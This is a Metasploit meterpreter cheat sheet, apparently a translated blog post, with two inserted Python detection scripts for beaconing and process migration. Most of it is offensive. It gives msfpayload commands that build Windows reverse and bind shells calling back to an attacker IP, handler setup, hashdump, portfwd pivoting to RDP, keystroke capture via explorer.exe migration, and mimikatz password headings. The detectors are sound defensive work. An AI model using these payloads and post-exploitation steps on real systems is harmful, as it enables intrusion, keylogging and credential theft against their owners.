Generate shell.exe for a listener: reverse_tcp (reverse connection)
Path: payload/windows/meterpreter/reverse_tcp
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=8080 X > ~/Desktop/shell.exe
reverse_http/https (reverse connection)
Path: payload/windows/meterpreter/reverse_http or payload/windows/meterpreter/reverse_https
msfpayload windows/meterpreter/reverse_https lhost=192.168.1.2 lport=8080 X > ~/Desktop/shell.exe
Reverse connections over HTTP/HTTPS can be slow and unstable. A blog post noted that if the HTTPS callback receives no data, changing the listening port to 443 is worth a try.
bind_tcp (forward connection)
Path: payload/windows/meterpreter/bind_tcp
A forward-connection shell: because a host in another intranet segment often cannot connect back to the attack machine, this is frequently used on intranets. lhost does not need to be set.
Listening for shell.exe:
msf > use exploit/multi/
msf > set payload windows/meterpreter/
msf > set lhost 192.168.1.2
msf > set lport 8080
msf > exploit
msf > sessions
Basic commands:
Common commands:
background: put the current session in the background
load/use: load a module
interact: switch into a channel
migrate: migrate to another process
run: execute an existing module. After typing run, press tab twice to list all available scripts; commonly used ones are autoroute, hashdump, arp_scanner, multi_meter_inject, etc.
resource: execute an existing rc script
Writing into a folder:
meterpreter > ls
Write content:
edit <file> opens the file in the vi editor.
Network related:
Network commands: ipconfig lists IP information, route shows and modifies the routing table, and portfwd sets up port forwarding.
meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2
Once the rule is established, connections to local port 1314 are forwarded to port 3389 on the remote host.
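From the defender's side, both the reverse connection described at the top of this page and the portfwd rule just shown leave a footprint in connection logs: a reverse_http-style handler is contacted at regular intervals, and traffic pivoted through portfwd appears to originate from the compromised host. The following script is an added example (not code from the original post) that parses constructed connection-log lines in an assumed "timestamp src dst dport proto" format, flags flows with regular check-in intervals as beacons, and then reports internal RDP connections whose source host is one of those beaconing hosts. The addresses, ports and timestamps in the sample are made up for the example.

```python
"""Added example (not from the original post): spot a reverse-connection
beacon and a pivoted RDP connection in constructed connection logs.
Assumes a simple 'timestamp src dst dport proto' line format."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log (not real traffic). 10.0.0.15 calls back to
# 192.168.1.2:8080 every 5 s (a reverse_http-style check-in), then opens
# RDP to an internal host as a portfwd pivot would; 10.0.0.20 is normal use.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:01 10.0.0.20 93.184.216.34 443 tcp
2024-05-01T10:00:03 10.0.0.20 93.184.216.34 443 tcp
2024-05-01T10:00:05 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:10 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:15 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:20 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:25 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:30 10.0.0.20 93.184.216.34 443 tcp
2024-05-01T10:00:30 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:35 10.0.0.15 192.168.1.2 8080 tcp
2024-05-01T10:00:40 10.0.0.15 10.0.0.7 3389 tcp
2024-05-01T10:01:45 10.0.0.20 93.184.216.34 443 tcp
2024-05-01T10:02:00 10.0.0.20 10.0.0.7 3389 tcp
2024-05-01T10:03:00 10.0.0.20 93.184.216.34 443 tcp
"""


def parse_log(text):
    """Parse log lines into (timestamp, src, dst, dport, proto) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, proto = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(port), proto))
    return events


def find_beacons(events, min_count=5, max_cv=0.2):
    """Return {(src, dst, dport): mean_interval_seconds} for flows whose
    connection intervals are regular (coefficient of variation <= max_cv).
    A reverse handler polled on a fixed schedule has a very low CV; human
    browsing to the same site does not."""
    by_flow = defaultdict(list)
    for ts, src, dst, port, _ in events:
        by_flow[(src, dst, port)].append(ts)
    beacons = {}
    for flow, stamps in by_flow.items():
        if len(stamps) < min_count:
            continue  # too few samples to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[flow] = avg
    return beacons


def find_pivot_rdp(events, beacons, rdp_port=3389):
    """Internal RDP connections whose source host is also beaconing out:
    consistent with traffic being forwarded through a compromised host."""
    beaconing_hosts = {src for src, _, _ in beacons}
    return [(ts.isoformat(), src, dst) for ts, src, dst, port, _ in events
            if port == rdp_port and src in beaconing_hosts]


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    found = find_beacons(evts)
    for flow, interval in found.items():
        print("beacon:", flow, "every %.1f s" % interval)
    for hit in find_pivot_rdp(evts, found):
        print("RDP from beaconing host:", hit)
```

The interval test is deliberately simple; on real logs you would tune min_count and max_cv to the log volume and add jitter-tolerant checks, but the structure (group by flow, measure regularity, then correlate lateral connections to the flagged hosts) is the part that carries over.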
Keyboard monitoring:
meterpreter > keyscan_dump
Note the concept of Windows sessions: Windows divides the desktop into separate sessions to manage interaction. Session 0 represents the console, and sessions 1, 2 and so on represent Remote Desktop sessions. So to capture keyboard input you must be in session 0. Use getdesktop to check which desktop you are on, or take a screenshot to see; otherwise use setdesktop to switch.
If that does not work, migrate into the explorer.exe process, which also lets you capture keyboard input after a Remote Desktop connection comes in.
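Migrating into explorer.exe, as described above, is visible to endpoint telemetry: the migration creates a thread inside the target process, which Sysmon records as Event ID 8 (CreateRemoteThread) with SourceImage and TargetImage fields. The script below is an added example (not code from the original post) that reads constructed JSON-lines records reduced to those fields (the JSON-lines layout is an assumption, not Sysmon's native format) and flags remote threads created in explorer.exe, winlogon.exe or lsass.exe by a source binary that lives outside System32, noting when the source sits in a user-writable directory. Paths, process IDs and names in the sample are made up.

```python
"""Added example (not from the original post): flag remote-thread creation
into explorer.exe and other sensitive processes, which is how process
migration shows up in endpoint telemetry. Input is constructed Sysmon-style
Event ID 8 records in an assumed JSON-lines layout."""
import json
from pathlib import PureWindowsPath

# Constructed records (not real telemetry); raw string keeps the JSON escapes.
SAMPLE_EVENTS = r"""
{"EventID": 8, "SourceImage": "C:\\Users\\bob\\Desktop\\shell.exe", "SourceProcessId": 4120, "TargetImage": "C:\\Windows\\explorer.exe", "TargetProcessId": 2212}
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "SourceProcessId": 612, "TargetImage": "C:\\Windows\\explorer.exe", "TargetProcessId": 2212}
{"EventID": 8, "SourceImage": "C:\\Program Files\\Vendor\\agent.exe", "SourceProcessId": 3300, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 5010}
{"EventID": 1, "Image": "C:\\Users\\bob\\Desktop\\shell.exe", "ProcessId": 4120}
"""

# Processes an implant typically migrates into for keystroke capture or
# credential access; the list is an assumption for the example.
SENSITIVE_TARGETS = {"explorer.exe", "winlogon.exe", "lsass.exe"}
# Source directories treated as trusted (lower-cased, trailing backslash).
TRUSTED_SOURCE_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Path fragments that indicate a user-writable location.
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\appdata\\")


def parse_events(text):
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def flag_remote_threads(records):
    """Return findings for Event ID 8 records where an untrusted source
    image created a thread in a sensitive target process."""
    findings = []
    for rec in records:
        if rec.get("EventID") != 8:
            continue  # only CreateRemoteThread records matter here
        src, tgt = rec["SourceImage"], rec["TargetImage"]
        tgt_name = PureWindowsPath(tgt).name.lower()
        if tgt_name not in SENSITIVE_TARGETS:
            continue
        src_lower = src.lower()
        if src_lower.startswith(TRUSTED_SOURCE_DIRS):
            continue  # system binaries legitimately touch these processes
        reason = "remote thread into %s from outside System32" % tgt_name
        if any(marker in src_lower for marker in USER_WRITABLE_MARKERS):
            reason += " (source in user-writable path)"
        findings.append({"source": src, "target": tgt,
                         "source_pid": rec.get("SourceProcessId"),
                         "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in flag_remote_threads(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

In production the trusted-source list needs care: security agents and some installers also create remote threads, so the allowlist is tuned per environment rather than fixed, and the user-writable-path note is what separates a suspicious source from merely an unfamiliar one.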
mimikatz:
Fetching clear-text passwords
Kali generate Shell listener target host